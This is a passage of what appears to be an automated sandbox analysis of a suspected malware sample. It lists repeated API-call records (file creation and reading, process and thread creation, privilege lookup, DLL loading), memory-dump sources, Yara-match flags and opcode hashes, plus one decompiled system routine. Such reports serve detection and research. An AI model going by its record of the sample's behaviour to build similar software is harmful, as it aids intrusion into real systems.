                                                                                                                                    • Instruction Fuzzy Hash: D190027620504442F50075599804E870009D7E0349F51D45AE041559CD8694D871F561
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 3832e37d0b041408b45cd8099a861738b078411d3477bafbff3acaf39b568be4
                                                                                                                                    • Instruction ID: 40770086de1224bcedd56235397a28ad00393892d50f41d3f3eccfd01156d8eb
                                                                                                                                    • Opcode Fuzzy Hash: 3832e37d0b041408b45cd8099a861738b078411d3477bafbff3acaf39b568be4
                                                                                                                                    • Instruction Fuzzy Hash: B490027220100403F10071599508B070009D7E0245F51D45AE041555CDD696D861B561
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                    • Instruction ID: 1399579d1129ea1dda0ea2f12224dd3f8cc66b4b6380c84d75a2d0b474b26a89
                                                                                                                                    • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 53%
                                                                                                                                    			E04BCFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                                                                                    				void* _t7;
                                                                                                                                    				intOrPtr _t9;
                                                                                                                                    				intOrPtr _t10;
                                                                                                                                    				intOrPtr* _t12;
                                                                                                                                    				intOrPtr* _t13;
                                                                                                                                    				intOrPtr _t14;
                                                                                                                                    				intOrPtr* _t15;
                                                                                                                                    
                                                                                                                                    				_t13 = __edx;
                                                                                                                                    				_push(_a4);
                                                                                                                                    				_t14 =  *[fs:0x18];
                                                                                                                                    				_t15 = _t12;
                                                                                                                                    				_t7 = E04B7CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                                                                                    				_push(_t13);
                                                                                                                                    				E04BC5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                                                                                    				_t9 =  *_t15;
                                                                                                                                    				if(_t9 == 0xffffffff) {
                                                                                                                                    					_t10 = 0;
                                                                                                                                    				} else {
                                                                                                                                    					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                                                                                    				}
                                                                                                                                    				_push(_t10);
                                                                                                                                    				_push(_t15);
                                                                                                                                    				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                                                                                    				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                                                                                    				return E04BC5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                                                                                    			}











                                                                                                                                    APIs
                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04BCFDFA
                                                                                                                                    Strings
                                                                                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04BCFE2B
                                                                                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04BCFE01
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                                                                    • API String ID: 885266447-3903918235
                                                                                                                                    • Opcode ID: 9c758bff1b830b25b028db6b3686360e020735e3c75e943af72cd36917386b6f
                                                                                                                                    • Instruction ID: d58588bf1bcd0d89e314507751841021aae068e8383bc9ed708248bfbb5429a0
                                                                                                                                    • Opcode Fuzzy Hash: 9c758bff1b830b25b028db6b3686360e020735e3c75e943af72cd36917386b6f
                                                                                                                                    • Instruction Fuzzy Hash: CCF0F632240212BFE6241A45DC46F33BF6AEB44731F244399F628561E1EA62F86096F4
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Executed Functions

                                                                                                                                    APIs
                                                                                                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,02F73B57,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02F73B57,007A002E,00000000,00000060,00000000,00000000), ref: 02F781CD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateFile
                                                                                                                                    • String ID: .z`
                                                                                                                                    • API String ID: 823142352-1441809116
                                                                                                                                    • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                    • Instruction ID: b50ee6a073bdbe60bf3d041f2316ef464278ae05fca107371e61ceee93126678
                                                                                                                                    • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                    • Instruction Fuzzy Hash: B8F0BDB2201208ABCB08DF88DC84EEB77EDAF8C754F158248FA0D97240C630E8118BA4
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,02F73B57,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02F73B57,007A002E,00000000,00000060,00000000,00000000), ref: 02F781CD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateFile
                                                                                                                                    • String ID: .z`
                                                                                                                                    • API String ID: 823142352-1441809116
                                                                                                                                    • Opcode ID: 88d1b07ae582fcbe2243286dfdbae8af6470fee96f81054242c4db3875054919
                                                                                                                                    • Instruction ID: 092e7f8a4b06b8a2434f03767756c0f90010a973bb36271ee84bcee878d19b94
                                                                                                                                    • Opcode Fuzzy Hash: 88d1b07ae582fcbe2243286dfdbae8af6470fee96f81054242c4db3875054919
                                                                                                                                    • Instruction Fuzzy Hash: 85F0F2B2210148AB8B08DF98D884CEB77A9AF8C354B05865DFA4D97202D230E851CBA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • NtClose.NTDLL(02F73CF0,?,?,02F73CF0,00000000,FFFFFFFF), ref: 02F782D5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Close
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3535843008-0
                                                                                                                                    • Opcode ID: a9bd78225b6cc662e83a3cd0fea817019b4bb353d2b923a30800eb1ab656472f
                                                                                                                                    • Instruction ID: e4197105160b905ac13314c4e6e4e715e9167e09828f46aa2a9b173a56aea849
                                                                                                                                    • Opcode Fuzzy Hash: a9bd78225b6cc662e83a3cd0fea817019b4bb353d2b923a30800eb1ab656472f
                                                                                                                                    • Instruction Fuzzy Hash: 41F03CB5200608ABCB14EF99DC85EE777ADEF88794F11865AFA4D97201C630E951CBE0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • NtReadFile.NTDLL(02F73D12,5E972F59,FFFFFFFF,02F739D1,?,?,02F73D12,?,02F739D1,FFFFFFFF,5E972F59,02F73D12,?,00000000), ref: 02F78275
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileRead
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                    • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                    • Instruction ID: c9ea6ed2eb11b94eb364689abe1cc4350db88766b21ad424178bfe9b39a74dbe
                                                                                                                                    • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                    • Instruction Fuzzy Hash: 1DF0A4B2200208ABCB14DF89DC84EEB77ADAF8C754F158249BA1D97241D630E8118BA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • NtClose.NTDLL(02F73CF0,?,?,02F73CF0,00000000,FFFFFFFF), ref: 02F782D5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Close
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3535843008-0
                                                                                                                                    • Opcode ID: fc9d48b720c402bc301c074f6737587dfd43ab30e4baf1eb44069f8698a720d6
                                                                                                                                    • Instruction ID: 841ae97be1cfdf42c14a0a2d41d9136f6cbe75cc795b087c52cf2a1ab7e25d43
                                                                                                                                    • Opcode Fuzzy Hash: fc9d48b720c402bc301c074f6737587dfd43ab30e4baf1eb44069f8698a720d6
                                                                                                                                    • Instruction Fuzzy Hash: D9E0127A640510AFD710EFD9CC84ED77B99EF483A0F154595BA1DDB351D530ED1086E0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • NtClose.NTDLL(02F73CF0,?,?,02F73CF0,00000000,FFFFFFFF), ref: 02F782D5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Close
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3535843008-0
                                                                                                                                    • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                    • Instruction ID: 597422c80564f5eac981647c7bd39e6a4eefe5daa8c9deb1ec3959817f568f8e
                                                                                                                                    • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                    • Instruction Fuzzy Hash: 79D01776200214ABD710EF98CC89EA77BADEF487A0F154499BA199B242C530FA108AE0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914642285.00000000036E0000.00000040.00000001.sdmp, Offset: 036E0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.914791319.00000000037FB000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000009.00000002.914799363.00000000037FF000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 51b039417ac6c64821142dfdf707f009183398cb95fa92b2a736b6fd7cc83f06
                                                                                                                                    • Instruction ID: a224a7d3868e8a0923dd602f69237bc99b0c4c7bbcd95e402dd0e161d7925b6c
                                                                                                                                    • Opcode Fuzzy Hash: 51b039417ac6c64821142dfdf707f009183398cb95fa92b2a736b6fd7cc83f06
                                                                                                                                    • Instruction Fuzzy Hash: E490026121184447E215A5694C14B070045D7D4343F51C129B4144554CCA9588A17561
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914642285.00000000036E0000.00000040.00000001.sdmp, Offset: 036E0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.914791319.00000000037FB000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000009.00000002.914799363.00000000037FF000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: efbbeb96dd72c7409900a4e75d5a8bcd0f3afe3c625b00a552ae41c589bbd171
                                                                                                                                    • Instruction ID: 288b3b6ffa03f32eea3e2e1f0e37ba9b2a6202d860dd349ea8da5cd5cb143d03
                                                                                                                                    • Opcode Fuzzy Hash: efbbeb96dd72c7409900a4e75d5a8bcd0f3afe3c625b00a552ae41c589bbd171
                                                                                                                                    • Instruction Fuzzy Hash: 129002B120104807E155B15944047460045D7D4341F51C025B9054554E87D98DD576A5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914642285.00000000036E0000.00000040.00000001.sdmp, Offset: 036E0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.914791319.00000000037FB000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000009.00000002.914799363.00000000037FF000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 313b2c5c4a65ee19f34efe2206d38de3dfdd1c674cafe3ea4530169e3add04dd
                                                                                                                                    • Instruction ID: cce5f7a20c106705a96afe422835269e835ebee03d333a07bee1cd7a10456486
                                                                                                                                    • Opcode Fuzzy Hash: 313b2c5c4a65ee19f34efe2206d38de3dfdd1c674cafe3ea4530169e3add04dd
                                                                                                                                    • Instruction Fuzzy Hash: 349002A134104847E115A1594414B060045D7E5341F51C029F5054554D8799CC927166
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914642285.00000000036E0000.00000040.00000001.sdmp, Offset: 036E0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.914791319.00000000037FB000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000009.00000002.914799363.00000000037FF000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: e3f42a20fbac04f6fc0c42147e3b6b968545f59299366842fb750f715e0f2dbc
                                                                                                                                    • Instruction ID: 76226f6ebf0f4a6cb7ac888de060b4007c88f0aeff89e403aaac56e319ce3179
                                                                                                                                    • Opcode Fuzzy Hash: e3f42a20fbac04f6fc0c42147e3b6b968545f59299366842fb750f715e0f2dbc
                                                                                                                                    • Instruction Fuzzy Hash: 9290027120104817E126A15945047070049D7D4281F91C426B4414558D97D68992B161
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914642285.00000000036E0000.00000040.00000001.sdmp, Offset: 036E0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.914791319.00000000037FB000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000009.00000002.914799363.00000000037FF000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914642285.00000000036E0000.00000040.00000001.sdmp, Offset: 036E0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.914791319.00000000037FB000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000009.00000002.914799363.00000000037FF000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914642285.00000000036E0000.00000040.00000001.sdmp, Offset: 036E0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.914791319.00000000037FB000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000009.00000002.914799363.00000000037FF000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914642285.00000000036E0000.00000040.00000001.sdmp, Offset: 036E0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.914791319.00000000037FB000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000009.00000002.914799363.00000000037FF000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914642285.00000000036E0000.00000040.00000001.sdmp, Offset: 036E0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.914791319.00000000037FB000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000009.00000002.914799363.00000000037FF000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914642285.00000000036E0000.00000040.00000001.sdmp, Offset: 036E0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.914791319.00000000037FB000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000009.00000002.914799363.00000000037FF000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914642285.00000000036E0000.00000040.00000001.sdmp, Offset: 036E0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.914791319.00000000037FB000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000009.00000002.914799363.00000000037FF000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914642285.00000000036E0000.00000040.00000001.sdmp, Offset: 036E0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.914791319.00000000037FB000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000009.00000002.914799363.00000000037FF000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • Sleep.KERNELBASE(000007D0), ref: 02F76F48
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Sleep
                                                                                                                                    • String ID: net.dll$wininet.dll
                                                                                                                                    • API String ID: 3472027048-1269752229
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • Sleep.KERNELBASE(000007D0), ref: 02F76F48
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Sleep
                                                                                                                                    • String ID: net.dll$wininet.dll
                                                                                                                                    • API String ID: 3472027048-1269752229
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02F63B93), ref: 02F784BD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeHeap
                                                                                                                                    • String ID: .z`
                                                                                                                                    • API String ID: 3298025750-1441809116
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02F63B93), ref: 02F784BD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeHeap
                                                                                                                                    • String ID: .z`
                                                                                                                                    • API String ID: 3298025750-1441809116
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02F63B93), ref: 02F784BD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeHeap
                                                                                                                                    • String ID: .z`
                                                                                                                                    • API String ID: 3298025750-1441809116
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02F670CA
                                                                                                                                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02F670EB
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePostThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1836367815-0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02F670CA
                                                                                                                                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02F670EB
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePostThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1836367815-0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02F69B62
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Load
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2234796835-0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02F78554
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateInternalProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2186235152-0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02F6CCA0,?,?), ref: 02F7700C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2422867632-0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02F6CCA0,?,?), ref: 02F7700C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2422867632-0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,02F6CF72,02F6CF72,?,00000000,?,?), ref: 02F78620
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LookupPrivilegeValue
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3899507212-0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,02F6CF72,02F6CF72,?,00000000,?,?), ref: 02F78620
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LookupPrivilegeValue
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3899507212-0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • SetErrorMode.KERNELBASE(00008003,?,?,02F67A73,?), ref: 02F6D40B
                                                                                                                                    Memory Dump Source
